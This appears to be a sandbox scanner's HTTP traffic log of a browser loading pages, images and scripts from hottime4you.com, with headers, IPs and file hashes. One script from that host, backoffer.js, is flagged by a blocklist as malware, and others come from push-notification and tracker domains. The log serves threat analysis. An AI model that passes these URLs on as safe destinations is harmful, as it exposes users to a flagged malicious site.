Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /ol/all/de/ms/25-687828/js/backoffer.js HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Date: Tue, 04 Oct 2022 07:45:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:33 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wVsQyx%2FOwXzVKN7%2BY0zTMyps3pbEb0i2WnPrIiU8Og2hd3NVEhbP2RBv3bQLSs0dYHHHHH0ZBMMMmAzaOv72zNjjP6IL1GvZP0UinjBrVGT%2FAl4P33kHYVrLybHQdVkhJzo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cfc080cb521-OSL
Content-Encoding: gzip
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  ASCII text, with very long lines (430), with no line terminators
Size:   230
Md5:    d1d761e3721375472889577260906f9c
Sha1:   c5e6e54e8b6b84af216d867dca79eb00c2819e42
Sha256: de8798dd7447b4651ec2d44931c15ceb0d3e5099997b2ddc2452d3f95092a1a2

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1 
Host: ajax.googleapis.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://hottime4you.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.42
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
                                        
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/hosted-libraries-pushers
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="hosted-libraries-pushers"
report-to: {"group":"hosted-libraries-pushers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/hosted-libraries-pushers"}]}
timing-allow-origin: *
content-length: 31017
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Sun, 02 Oct 2022 18:46:42 GMT
expires: Mon, 02 Oct 2023 18:46:42 GMT
cache-control: public, max-age=31536000, stale-while-revalidate=2592000
last-modified: Wed, 10 Mar 2021 14:28:09 GMT
age: 133152
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65447)
Size:   31017
Md5:    7808e0e4b7a714230373852158500533
Sha1:   4a79d18722a68a2f38d52e2d3a11b550bdd30b3c
Sha256: 8ba5796bee6a065b8b31895e7e8d59ba564cfd36d2ce056e327588e67736f054
                                        
POST / HTTP/1.1
Host: ocsp.sca1b.amazontrust.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
143.204.42.158
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Tue, 04 Oct 2022 07:45:54 GMT
Last-Modified: Tue, 04 Oct 2022 06:41:13 GMT
Server: ECS (nyb/1D13)
X-Cache: Miss from cloudfront
Via: 1.1 814e8c24454087e83cd261a6cf477166.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: tb4Nzy8B30PDViT6skGzVQcVEbKtBUaL_eiLzBVfoXiHJSkj4NKSWA==
Age: 3881

                                        
GET /mng/channels/init.min.js?ver=1638888212 HTTP/1.1
Host: static.production.almightypush.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://hottime4you.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
54.230.111.86
HTTP/2 200 OK
content-type: application/javascript
content-length: 21924
last-modified: Mon, 05 Sep 2022 12:24:26 GMT
accept-ranges: bytes
server: AmazonS3
date: Tue, 04 Oct 2022 02:50:44 GMT
etag: "2ea196bb9d9670ec138eb0c8c23e6696"
x-cache: Hit from cloudfront
via: 1.1 193a8c13b6e0a6b90db7172f6358335e.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: G6YR1gi2mqWNUJyM7kfugi2KBEL5w1NRkef2mCLRqpUJyKPZc7VwyA==
age: 17770
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   21924
Md5:    2ea196bb9d9670ec138eb0c8c23e6696
Sha1:   b0876fd8c0c56c5d34368c16a829c040c23cbaba
Sha256: 1475c052ae8dbc220775cd44b20e508e38db9f09168c57d4a73e0a9027f252f7
                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 07:45:54 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 07:45:54 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Server: nginx
Content-Length: 503
ETag: "B12EC8437562CF2BEB1F5218AB1D291D1ADCD2827DC62398CAED91C63DB60B0C"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=244
Expires: Tue, 04 Oct 2022 07:49:58 GMT
Date: Tue, 04 Oct 2022 07:45:54 GMT
Connection: keep-alive

                                        
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
143.204.55.27
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Tue, 04 Oct 2022 07:29:33 GMT
Cache-Control: max-age=3600, max-age=3600
Expires: Tue, 04 Oct 2022 08:26:00 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 410f51195842d9b592b15d6588c36654.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: ZF1qJ9ARmLtxZTuCmK_HVH8JdCNfywjbZIALXS2PuiQUMyl6JZ13CA==
Age: 981


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Accept-Ranges: bytes
Age: 5327
Cache-Control: 'max-age=158059'
Date: Tue, 04 Oct 2022 07:45:55 GMT
Last-Modified: Tue, 04 Oct 2022 06:17:08 GMT
Server: ECS (ska/F71B)
X-Cache: HIT
Content-Length: 471

                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 07:45:55 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Server: nginx
Content-Length: 503
ETag: "B4FF4E9889EC9C279BBE99F41CFDE4F340421C33863A764110422277454DE5DF"
Last-Modified: Mon, 03 Oct 2022 10:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2722
Expires: Tue, 04 Oct 2022 08:31:17 GMT
Date: Tue, 04 Oct 2022 07:45:55 GMT
Connection: keep-alive

                                        
GET /s/quattrocentosans/v18/va9c4lja2NVIDdIAAoMR5MfuElaRB0zJt08.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: http://hottime4you.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
216.58.207.195
HTTP/2 200 OK
content-type: font/woff2
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 24320
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Wed, 28 Sep 2022 23:47:50 GMT
expires: Thu, 28 Sep 2023 23:47:50 GMT
cache-control: public, max-age=31536000
age: 460685
last-modified: Wed, 27 Apr 2022 16:02:38 GMT
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format (Version 2), TrueType, length 24320, version 1.0\012- data
Size:   24320
Md5:    056a6ed9c698772e2438032629f4933e
Sha1:   e88b32e3d9492e241bf5451e95967c5597f29967
Sha256: 86380b40e3d14ed9f3e0a5ff79c04f510d7910f677a66685e2b10f8b8765797f
                                        
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 07:45:55 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
GET /ol/all/de/ms/25-687828/images/12.png HTTP/1.1
Host: hottime4you.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 58018
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:27 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FYWmZGJ2PhocMSJzp%2F3r8TqihzsF9IrTxre9sCWsco4tZqu%2BjwWxMqCAFEDfNiSmfbtM7XeeCaB3JA2YbtTDvrfFSuogby5ISPooT69%2BdotiaUUz4RTjk1QgPX%2FIr3Hwaf8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cff8bddb4fd-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   58018
Md5:    46fb821d3c8ca1b808dcc54300710f89
Sha1:   8c2af696ea30e845c7c8cc249909e26755de3f8d
Sha256: 48f9f84693e443822172bc338b16f6bed62c4cbeb686f8018dcd2bf691007b62
                                        
GET /ol/all/de/ms/25-687828/images/31.png HTTP/1.1
Host: hottime4you.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 59718
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:30 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XSx27UPFZKOY3BArMykJzAXb4IOxVf%2BsjTrsvdjS5Bf7hCKMaRcZ%2Fvbs2fEL8q3SbjQ5UvYhUZ9J%2BQgvye%2BxWWwjRLGY9QFTlgV5cQaP1FD3N03VDMju%2FbCH%2BEdjdEX0ayg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cff8a10b523-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   59718
Md5:    8219bfcdb7286bd03b2295e4065d3c38
Sha1:   459b57ce62406ba97b9682cf8da47fc53f18fe2f
Sha256: 78ecebccf0b424f613fac6ca2c34e5d9bc7cccab0b2b0cc88efb23bb2a8a6bea
                                        
GET /ol/all/de/ms/25-687828/images/25.png HTTP/1.1
Host: hottime4you.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 67145
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:30 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t4Q3Q9%2FkIc6CSr6GoyzNBRLVDut2Ic7xiHn9p0XroyUfTUo2Hc3MgdiDJ70XQGpXS7GqiB%2Bl%2FduqWPyqqMOeeMF0Jt8F9xGtQxKb8JVZeG3Kui6DKtzR%2FI4U4syyCi22VcQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cff8cc6b521-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   67145
Md5:    d1b1b830be86c68486835a237652ed19
Sha1:   a72ee10174523bbcea9e7fbb09dd79de10e6f38d
Sha256: 9809a272cdb59025422645d54b003a4b425ea461e3fe7218d83f6551a55b5e1b
                                        
GET /ol/all/de/ms/25-687828/images/32.png HTTP/1.1
Host: hottime4you.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 55175
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:30 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vmux04%2Bgm8rNeouxwrrWvuvGvIcjJgBQYU1kgPoEXujrPdVcHGFY0rRQI%2BDEIW3mfqRg0yPUc%2FDIVGNVz2nmPmTbwRKUBC6xEZMwmeJiO84%2FRVfsD8W7zbUK9302nZ1i5j0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cff8cd60afe-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   55175
Md5:    8c58ae244f7bd521506573d2589cf8b9
Sha1:   a7ce9a4e1cb43e2f4efe2094f576285b4f25b9c6
Sha256: c178cb0498a1a548575f8f9e3911e45fdef95cfbb7b229fabb1955aca060fdf8
                                        
GET /ol/all/de/ms/25-687828/images/24.png HTTP/1.1
Host: hottime4you.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 58158
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:30 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MSDZRCqX1OhPQXfJ%2Ffi292OH4Z5yCxlQPdRv1MTk4AkRSTjFzoX%2FPLgvF8V0vL1qo8mDyo%2F6%2Bch6V8EpiYK6m2YlJtFtaQ8HizevdiHjc4e%2BZBrdHVADX0FrANkbXz2nx5s%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cff8fe9b524-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   58158
Md5:    5275c3e17ee2ba370c01ae31249d42af
Sha1:   98c09ca29deff276fd966d313599ffdf397c55e4
Sha256: f05b3a33818bc9d5dd44fe4074f1818f19efb54d70def227b72ab36ea5bd2c78
                                        
GET /ol/all/de/ms/25-687828/images/42.png HTTP/1.1
Host: hottime4you.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 63889
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:31 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QHoit%2Bbu%2BeYSS9p4DE9oysp9mxD1gJghbRK%2B0tdpG9iUywsDCCCufHEi%2F13K%2FvyN5yIE5QTawaPD0XtElOBubZFvAhYsBN0N6NWdICfyOCFWYKcr8yx%2B%2F5VONHdCNMDfGEg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4cff89dfb4f7-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   63889
Md5:    9a78453a120ef776608b04ff29cdeae1
Sha1:   b1f7c5bfc3a5999845d1d101a9efccadbc6066b3
Sha256: bac36e0cd616d2c9716ee7ea996e086ad48f10589f0ed45e1562fe99d1db00df
                                        
GET /jscode/JAIA.js?sub1=hottime4you.com&sub2=&sub3=&sub4=&sub5=&prid= HTTP/1.1
Host: alexatracker.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
